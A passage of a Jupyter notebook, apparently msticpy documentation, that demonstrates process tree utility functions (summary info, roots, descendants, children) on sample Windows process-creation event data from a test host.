"nbdisplay.plot_process_tree(svcs_tree, legend_col=\"Rarity\", show_table=True)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Process Tree utility functions\n", "\n", "The `process_tree_utils` module has a number of functions that may be useful in extracting or manipulating process trees or tree relationships.\n", "\n", "### Functions\n", "- build_process_key\n", "- build_process_tree\n", "- get_ancestors\n", "- get_children\n", "- get_descendents\n", "- get_parent\n", "- get_process\n", "- get_process_key\n", "- get_root\n", "- get_root_tree\n", "- get_roots\n", "- get_siblings\n", "- get_summary_info\n", "- get_tree_depth\n", "- infer_schema" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### get_summary_info\n", "Get summary information." ] }, { "cell_type": "code", "execution_count": 10, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:46.996996Z", "start_time": "2020-08-25T15:53:46.968996Z" }, "scrolled": true }, "outputs": [ { "data": { "text/plain": [ "{'Processes': 1010,\n", " 'RootProcesses': 10,\n", " 'LeafProcesses': 815,\n", " 'BranchProcesses': 185,\n", " 'IsolatedProcesses': 0,\n", " 'LargestTreeDepth': 7}" ] }, "execution_count": 10, "metadata": {}, "output_type": "execute_result" } ], "source": [ "ptree.get_summary_info(p_tree_win)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### get_roots\n", "Get roots of all trees in the data set." ] }, { "cell_type": "code", "execution_count": 11, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:47.044995Z", "start_time": "2020-08-25T15:53:46.999997Z" }, "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a", "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)", "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6" }, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\windows\\system32\\svchost.exe0x2701970-01-01 00:00:00.00000052b1ab41-869e-4138-9e40-2a4457f09bf0NaN46881970-01-01MSTICAlertsWin1NaNNaNNaN0x3e70x270...NaNNaNNaNNaTNaNTrueFalseFalse1000NaN
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x7981970-01-01 00:00:00.00000052b1ab41-869e-4138-9e40-2a4457f09bf0NaN46881970-01-01MSTICAlertsWin1NaNNaNNaN0x3e70x798...NaNNaNNaNNaTNaNTrueFalseFalse1001NaN
c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 00:00:00.00000052b1ab41-869e-4138-9e40-2a4457f09bf0NaN46881970-01-01MSTICAlertsWin1NaNNaNNaN0x3e70xb3c...NaNNaNNaNNaTNaNTrueFalseFalse1002NaN
c:\\windows\\system32\\services.exe0x2201970-01-01 00:00:00.00000052b1ab41-869e-4138-9e40-2a4457f09bf0NaN46881970-01-01MSTICAlertsWin1NaNNaNNaN0x3e70x220...NaNNaNNaNNaTNaNTrueFalseFalse1003NaN
c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.00000052b1ab41-869e-4138-9e40-2a4457f09bf0NaN46881970-01-01MSTICAlertsWin1NaNNaNNaN0x3e70x864...NaNNaNNaNNaTNaNTrueFalseFalse1004NaN
\n", "

5 rows × 35 columns

\n", "
" ], "text/plain": [ " TenantId \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "\n", " Account EventID \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... NaN 4688 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN 4688 \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... NaN 4688 \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... NaN 4688 \n", "c:\\program files\\microsoft monitoring agent\\age... NaN 4688 \n", "\n", " TimeGenerated \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... 1970-01-01 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... 1970-01-01 \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... 1970-01-01 \n", "c:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \n", "\n", " Computer \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... MSTICAlertsWin1 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... MSTICAlertsWin1 \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... MSTICAlertsWin1 \n", "c:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \n", "\n", " SubjectUserSid \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... NaN \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... NaN \n", "c:\\program files\\microsoft monitoring agent\\age... NaN \n", "\n", " SubjectUserName \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... NaN \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... NaN \n", "c:\\program files\\microsoft monitoring agent\\age... NaN \n", "\n", " SubjectDomainName \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... NaN \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... NaN \n", "c:\\program files\\microsoft monitoring agent\\age... NaN \n", "\n", " SubjectLogonId \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... 0x3e7 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... 0x3e7 \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... 0x3e7 \n", "c:\\program files\\microsoft monitoring agent\\age... 0x3e7 \n", "\n", " NewProcessId ... \\\n", "proc_key ... \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... 0x270 ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x798 ... \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... 0xb3c ... \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... 0x220 ... \n", "c:\\program files\\microsoft monitoring agent\\age... 0x864 ... \n", "\n", " source_index_par \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... NaN \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... NaN \n", "c:\\program files\\microsoft monitoring agent\\age... NaN \n", "\n", " ProcessId_par \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... NaN \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... NaN \n", "c:\\program files\\microsoft monitoring agent\\age... NaN \n", "\n", " NewProcessName_par \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... NaN \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... NaN \n", "c:\\program files\\microsoft monitoring agent\\age... NaN \n", "\n", " TimeGenerated_orig_par \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... NaT \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaT \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... NaT \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... NaT \n", "c:\\program files\\microsoft monitoring agent\\age... NaT \n", "\n", " parent_key IsRoot IsLeaf \\\n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... NaN True False \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN True False \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... NaN True False \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... NaN True False \n", "c:\\program files\\microsoft monitoring agent\\age... NaN True False \n", "\n", " IsBranch path parent_index \n", "proc_key \n", "c:\\windows\\system32\\svchost.exe0x2701970-01-01 ... False 1000 NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False 1001 NaN \n", "c:\\windows\\system32\\svchost.exe0xb3c1970-01-01 ... False 1002 NaN \n", "c:\\windows\\system32\\services.exe0x2201970-01-01... False 1003 NaN \n", "c:\\program files\\microsoft monitoring agent\\age... False 1004 NaN \n", "\n", "[5 rows x 35 columns]" ] }, "execution_count": 11, "metadata": {}, "output_type": "execute_result" } ], "source": [ "# Get roots of all trees in the set\n", "ptree.get_roots(p_tree_win).head()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### get_descendents\n", "Get the full tree beneath a process." ] }, { "cell_type": "code", "execution_count": 12, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:47.138996Z", "start_time": "2020-08-25T15:53:47.047998Z" }, "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a", "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)", "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6" }, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\waappagent.exe0x19941970-01-01 00:00:00.00000052b1ab41-869e-4138-9e40-2a4457f09bf0NaN46881970-01-01 00:00:00.000MSTICAlertsWin1NaNNaNNaN0x3e70x1994...NaNNaNNaNNaTNaNTrueFalseFalse1007NaN
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x123c2019-02-09 23:16:28.15300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:16:28.153MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x123c...NaNNaNNaN1970-01-01 00:00:00.000c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/1031007
c:\\windows\\system32\\conhost.exe0x20b02019-02-09 23:16:28.16300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:16:28.163MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x20b0...986.00x1994C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...2019-02-09 23:16:28.153c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseTrueFalse1007/103/104103
c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:20:15.54700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:20:15.547MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xccc...986.00x1994C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...2019-02-09 23:16:28.153c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/103/105103
c:\\windows\\system32\\conhost.exe0x14ec2019-02-09 23:20:15.56000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:20:15.560MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x14ec...988.00x123cC:\\Windows\\System32\\cmd.exe2019-02-09 23:20:15.547c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:...FalseTrueFalse1007/103/105/106105
\n", "

5 rows × 35 columns

\n", "
" ], "text/plain": [ " TenantId \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "\n", " Account \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... WORKGROUP\\MSTICAlertsWin1$ \n", "\n", " EventID \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... 4688 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 4688 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 4688 \n", "\n", " TimeGenerated \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 00:00:00.000 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 23:16:28.153 \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... 2019-02-09 23:16:28.163 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 2019-02-09 23:20:15.547 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 2019-02-09 23:20:15.560 \n", "\n", " Computer \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... MSTICAlertsWin1 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... MSTICAlertsWin1 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... MSTICAlertsWin1 \n", "\n", " SubjectUserSid \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... S-1-5-18 \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... S-1-5-18 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... S-1-5-18 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... S-1-5-18 \n", "\n", " SubjectUserName \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1$ \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... MSTICAlertsWin1$ \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... MSTICAlertsWin1$ \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... MSTICAlertsWin1$ \n", "\n", " SubjectDomainName \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... WORKGROUP \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... WORKGROUP \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... WORKGROUP \n", "\n", " SubjectLogonId \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... 0x3e7 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 0x3e7 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 0x3e7 \n", "\n", " NewProcessId ... \\\n", "proc_key ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x1994 ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x123c ... \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... 0x20b0 ... \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 0xccc ... \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 0x14ec ... \n", "\n", " source_index_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... 986.0 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 986.0 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 988.0 \n", "\n", " ProcessId_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... 0x1994 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 0x1994 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 0x123c \n", "\n", " NewProcessName_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-... \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-... \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... C:\\Windows\\System32\\cmd.exe \n", "\n", " TimeGenerated_orig_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaT \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 00:00:00.000 \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... 2019-02-09 23:16:28.153 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 2019-02-09 23:16:28.153 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 2019-02-09 23:20:15.547 \n", "\n", " parent_key \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:... \n", "\n", " IsRoot IsLeaf IsBranch \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... True False False \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False False True \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... False True False \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... False False True \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... False True False \n", "\n", " path \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007/103 \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... 1007/103/104 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 1007/103/105 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 1007/103/105/106 \n", "\n", " parent_index \n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007 \n", "c:\\windows\\system32\\conhost.exe0x20b02019-02-09... 103 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 103 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 105 \n", "\n", "[5 rows x 35 columns]" ] }, "execution_count": 12, "metadata": {}, "output_type": "execute_result" } ], "source": [ "# Take one of those roots and get the full tree beneath it\n", "t_root = ptree.get_roots(p_tree_win).loc[\"c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\waappagent.exe0x19941970-01-01 00:00:00.000000\"]\n", "full_tree = ptree.get_descendents(p_tree_win, t_root)\n", "full_tree.head()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### get_children\n", "Get the immediate children of a process" ] }, { "cell_type": "code", "execution_count": 13, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:47.202996Z", "start_time": "2020-08-25T15:53:47.143997Z" }, "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a", "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)", "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6" }, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x1c542019-02-09 22:11:59.87700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:11:59.877MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1c54...NaNNaNNaN1970-01-01c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/691007
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x123c2019-02-09 23:16:28.15300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:16:28.153MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x123c...NaNNaNNaN1970-01-01c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/1031007
c:\\windowsazure\\secagent\\wasecagentprov.exe0xda82019-02-09 23:55:46.05700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:55:46.057MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xda8...NaNNaNNaN1970-01-01c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/1231007
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x7fc2019-02-10 00:22:33.81300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:22:33.813MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x7fc...NaNNaNNaN1970-01-01c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/1341007
